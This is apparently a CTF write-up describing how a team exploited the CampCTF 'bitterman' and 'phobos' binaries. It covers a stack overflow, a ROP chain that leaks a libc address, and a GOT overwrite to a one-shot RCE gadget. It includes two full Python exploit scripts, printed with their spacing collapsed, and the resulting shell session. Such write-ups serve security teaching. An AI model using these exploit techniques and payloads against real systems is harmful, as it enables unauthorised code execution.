I rolled into the CampCTF while Swappage was already working on it. He had started on bitterman, a 400 point challenge.
We’re given a 64-bit ELF binary and Swappage also managed to obtain the corresponding libc. Upon starting the binary, we’re presented with the following:
> What's your name?
> Please input the length of your message:
> Please enter your text:
> Thanks!
The x after the BBBB in the above example was actually 0x7f, so the binary is leaking part of an address (we later determined it to be a stack address). In the end, I couldn’t make use of this, but it was interesting to see. Swappage already found the bugs: we can send a large message length and this will allow us to overflow a stack buffer. NX is enabled so it’s ROP time!
Besides NX, ASLR is also enabled. This means we have to first leak a libc address to calculate libc’s base address and then something like system(). I made use of the puts@plt to write out the contents of puts@got. The latter contains the libc address of puts(), which we can then receive. Superkojiman was able to find the one-shot RCE gadget. The ROP chain goes to read@plt and awaits our input. Upon receiving the address of the one-shot RCE gadget in libc, the ROP chain overwrites puts@got and restarts the binary from main(). This latter decision was based on using system() instead of the one-shot RCE gadget, but by the time I was done implementing the ROP chain, superkojiman had already supplied the offset. When main() restarts, one of the first functions it calls is puts@plt, which is now pointing to the shell-spawning one-shot RCE gadget. We land a shell and are happy!
#!/usr/bin/pythonimportstruct,timefromsocketimport*defq(x):returnstruct.pack("<Q",x)defreadtil(delim):buf=b''whilenotdeliminbuf:buf+=s.recv(1)returnbufpayload="A"*152# ty Swappage!'''0x000002bc : pop r12; pop r13; pop r14; pop r15; ret0x00000296 : xor ebx, ebx; nop [rax + rax]; mov rdx, r13; mov rsi, r14; mov edi, r15d; call [r12 + rbx*8]0x00000060 : pop rbp; ret'''base=0x400590# prologue, needed for later! after the [call r12 + rbx*8], there is# a cmp rbx, rbp. At this point, rbx is 1 and if rbp is not equal to rbx, # the code jumps back instead of leading to a ret!# therefore, we set up rbp first. payload+=q(0x00000060+base)# pop rbp ; retpayload+=q(1)# value for rbp# first, we set up some registers, which will later be put in the correct registers# puts() uses rdi as argumentpayload+=q(0x000002bc+base)payload+=q(0x600c50)# value for r12 -> puts@gotpayload+=q(0)# value for r13 -> goes into rdx payload+=q(0)# value for r14 -> goes into rsipayload+=q(0x600c50)# value for r15 -> goes into rdi -> leak addr of puts()# swap around the registers and call puts()payload+=q(0x00000296+base)payload+=q(0)*7# without this, we don't get outputpayload+=q(0x400570)# fflush@plt# now read() to overwrite printf()# read() is blocking and will wait for our input :)# again, first set up rbppayload+=q(0x00000060+base)# pop rbp ; retpayload+=q(1)# value for rbp# set up registers/arguments for read()payload+=q(0x000002bc+base)payload+=q(0x600c60)# value for r12 -> read@gotpayload+=q(8)# value for r13 -> goes into rdx -> countpayload+=q(0x600c50)# value for r14 -> goes into rsi -> overwrite puts@gotpayload+=q(0)# value for r15 -> goes into rdi -> 0 -> stdinpayload+=q(0x00000296+base)payload+=q(0)*7# restart main(), so the binary will execute puts() -> one shot rce, lands a shell# could've just a easily return to puts@plt...payload+=q(0x4006ec)defpwn():globalss=socket(AF_INET,SOCK_STREAM)s.connect(('challs.campctf.ccc.ac',10103))readtil('name?')s.send('a\n')readtil('message:')s.send('-1\n')# ty Swappage!readtil('text:')s.send(payload+'\n')readtil('Thanks!\n')data=s.recv(8)data=data[:-1]+"\x00\x00"puts_addr=struct.unpack('<Q',data)[0]print"[+] Leaked puts(): "+hex(struct.unpack('<Q',data)[0])libc_base=puts_addr-0x70a30print"[+] libc base addr: "+hex(libc_base)system_addr=libc_base+0x442AA# one shot rce, ty superkojiman!print"[+] sending one shot rce addr ("+hex(system_addr)+")"# the rop chain will wait at read(), because that is blocking# send the address to overwrite puts@gots.send(q(system_addr))importtelnetlibt=telnetlib.Telnet()t.sock=st.interact()pwn()
[+] Leaked puts(): 0x7fb9d6487a30
[+] libc base addr: 0x7fb9d6417000
[+] sending one shot rce addr (0x7fb9d645b2aa)id
ls -alh
total 40K
drwxr-xr-x 2 root root 4.0K Aug 13 13:46 .
drwxr-xr-x 3 root root 4.0K Aug 5 21:43 ..
-rw-r--r-- 1 root root 220 Aug 5 19:55 .bash_logout
-rw-r--r-- 1 root root 3.7K Aug 5 19:55 .bashrc
-rw-r--r-- 1 root root 675 Aug 5 19:55 .profile
-rwxr-xr-x 1 root root 11K Aug 12 01:28 bitterman
-rw-r--r-- 1 root root 43 Aug 13 13:47 flag.txt
-rwxr-xr-x 1 root root 64 Aug 12 01:34 run.sh
cat flag.txt
CAMP15_a786be6aca70bfd19b6af86133991f80 -
Next, we turned to phobos for 300 points, which is nearly the same binary but without NX! After a few small changes to the previous exploit, we obtained the flag for phobos as well:
#!/usr/bin/pythonimportstruct,timefromsocketimport*defq(x):returnstruct.pack("<Q",x)defreadtil(delim):buf=b''whilenotdeliminbuf:buf+=s.recv(1)returnbufpayload="A"*136# ty Swappage!'''0x000002bc : pop r12; pop r13; pop r14; pop r15; ret0x000002b6 : xor ebx, ebx; nop [rax + rax]; mov rdx, r13; mov rsi, r14; mov edi, r15d; call [r12 + rbx*8]0x00000060 : pop rbp; ret'''base=0x400590# prologue, needed for later!payload+=q(0x00000060+base)# pop rbp ; retpayload+=q(1)# value for rbppayload+=q(0x000002dc+base)payload+=q(0x600c70)# value for r12 -> puts@gotpayload+=q(0)# value for r13 -> goes into rdx payload+=q(0)# value for r14 -> goes into rsipayload+=q(0x600c70)# value for r15 -> goes into rdi -> leak addr of puts()payload+=q(0x000002b6+base)payload+=q(0)*7payload+=q(0x400570)# fflush@plt# now read() to overwrite printf()payload+=q(0x00000060+base)# pop rbp ; retpayload+=q(1)# value for rbppayload+=q(0x000002dc+base)payload+=q(0x600c80)# value for r12 -> read@gotpayload+=q(8)# value for r13 -> goes into rdx -> countpayload+=q(0x600c70)# value for r14 -> goes into rsi -> overwrite printf()payload+=q(0)# value for r15 -> goes into rdi -> 0 -> stdinpayload+=q(0x000002b6+base)payload+=q(0)*7payload+=q(0x4006ec)# restart, so the binary will execute puts() -> one shot rce, lands a shelldefpwn():globalss=socket(AF_INET,SOCK_STREAM)s.connect(('challs.campctf.ccc.ac',10106))#s.connect(('localhost', 4444))printreadtil('name?')s.send('a\n')printreadtil('message:')s.send('-1\n')# ty Swappage!printreadtil('text:')s.send(payload+'\n')printreadtil('Thanks!\n')data=s.recv(8)data=data[:-1]+"\x00\x00"puts_addr=struct.unpack('<Q',data)[0]print"[+] Leaked puts(): "+hex(struct.unpack('<Q',data)[0])libc_base=puts_addr-0x70a30print"[+] libc base addr: "+hex(libc_base)system_addr=libc_base+0x442AA# one shot rce, ty superkojiman!print"[+] sending one shot rce addr ("+hex(system_addr)+")"s.send(q(system_addr))importtelnetlibt=telnetlib.Telnet()t.sock=st.interact()pwn()
And in action:
bas@tritonal:~/bin/ccc/phobos$ python poc2.py
> What's your name?
Hi, a
> Please input the length of your message:
> Please enter your text:
> Thanks!
[+] Leaked puts(): 0x7fa6830dda30
[+] libc base addr: 0x7fa68306d000
[+] sending one shot rce addr (0x7fa6830b12aa)id
uid=1001(challenge)gid=1001(challenge)groups=1001(challenge)cat flag.txt
It’s quite nice to solve a 400 point challenge only to find out we can use nearly the same solution for an additional 300 points!